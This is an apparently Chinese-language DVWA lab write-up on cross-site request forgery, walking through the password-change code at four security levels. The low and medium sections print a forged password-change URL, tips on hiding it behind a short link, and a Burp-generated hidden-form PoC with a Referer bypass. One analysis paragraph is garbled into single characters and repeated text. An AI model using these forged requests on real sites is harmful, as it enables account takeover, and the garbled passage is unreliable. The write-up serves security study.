DVWA-CSRF
CSRF
原理
CSRF(Cross-site request forgery)跨站请求伪造,也被称为"One Click Attack"或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
攻击方式的特点是:
攻击者盗用你的身份,以你的名义进行某些非法操作。CSRF能够使用你的帐户发送邮件,获取你的敏感信息,甚至盗取财产等等
Low CSRF Source
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
mysql_close();
}
?>
分析low防御等级的代码可见
代码中在获取了pass_new和
p
a
s
s
c
o
n
f
这
两
个
变
量
之
后
,
利
用
m
y
s
q
l
r
e
a
l
e
s
c
a
p
e
s
t
r
i
n
g
(
)
函
数
进
行
了
过
滤
,
一
定
程
度
上
防
止
了
S
Q
L
注
入
,
但
是
无
法
防
御
c
s
r
f
攻
击
因
为
p
a
s
s
n
e
w
和
pass_conf这两个变量之后,利用mysql_real_escape_string()函数进行了过滤,一定程度上防止了SQL注入,但是无法防御csrf攻击 因为pass_new和
passconf这两个变量之后,利用mysqlrealescapestring()函数进行了过滤,一定程度上防止了SQL注入,但是无法防御csrf攻击因为passnew和pass_conf两个变量便被直接代入uodate语句中执行了数据库更新操作
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
如果用户点击了黑客构造好的csrf.html页面上去,黑客在自己的浏览器当然是无法执行修改操作的,如果黑客引诱用户点击crsf.html页面,那么用户就受到黑客精心构造好的陷害,黑客会改掉用户的密码将用户账号据为己有。
但是这种攻击显得有些拙劣,链接可以看出已经被更改,被攻击者点击连接之后也会看见自己的密码被更改
那为了掩藏自己,其实我们可以采用另一个措施,也就是使用短链接来隐藏url,这样子用户点击短链接也会跳转到黑客指定的真是的网站
可以借助工具,或者脚本,把原网址缩短然后诱导用户点击该链接,完成攻击
此时用户点击网站http://dvwa.cn/跳转到真实网站 http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#完成密码的修改
但是即使黑客使用了短链接但是用户始终会收到密码被更改的通知,此时攻击还是被发现了,此次攻击始终是不高明的
Medium CSRF Source
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
mysql_close();
}
?>
分析此时的medium代码可知,相比于之前,这个防御等级的代码在pass_new和$pass_conf两个参数之前使用了if函数来判断“_SERVER[‘HTTP_REFERER’]”的值是否是127.0.0.1,这是相对于csrf的一个防御措施
此处的HTTP_Referer变量,HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。
$_SERVER中的SERVER_NAME,是http包头里面的Host参数,默认情况下直接输出apache的配置文件httpd.conf中的ServerName值
使用brup suite
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.anantest.com:8081/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="aaaaaaaa" />
<input type="hidden" name="password_conf" value="aaaaaaaa" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
以上为构造的html代码
我们可以把攻击页面命名为主机ip.html然后把页面放置到攻击者的服务器里面形成绕过
此时用户以为点击了一个无法访问的页面,但实际上已经被篡改了密码
密码修改成功
High CSRF Source
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
此处代码运用了token和二次验证,二次验证的用处在于执行某些操作时会向用户确认,是否执行,或者要第二次输入密码才可以执行。关于token参数这一块的,我在另一篇关于宏的文章也提到了brup suite宏的用法
本票用了宏来做hight的防御级别。请有兴趣的小朋友转跳过去
Impossible CSRF Source
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_curr = $_GET[ 'password_current' ];
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Sanitise current password input
$pass_curr = stripslashes( $pass_curr );
$pass_curr = mysql_real_escape_string( $pass_curr );
$pass_curr = md5( $pass_curr );
// Check that the current password is correct
$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
$data->execute();
// Do both new passwords match and does the current password match the user?
if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
// It does!
$pass_new = stripslashes( $pass_new );
$pass_new = mysql_real_escape_string( $pass_new );
$pass_new = md5( $pass_new );
// Update database with new password
$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->execute();
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match or current password incorrect.</pre>";
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
此处利用了PDO来防御SQL注入,对于csrf的防御方面,要求用户输入原始密码,攻击者在不知道原始密码的情况下无法进行csrf的攻击,这样子做很大程度上进行了csrf的防御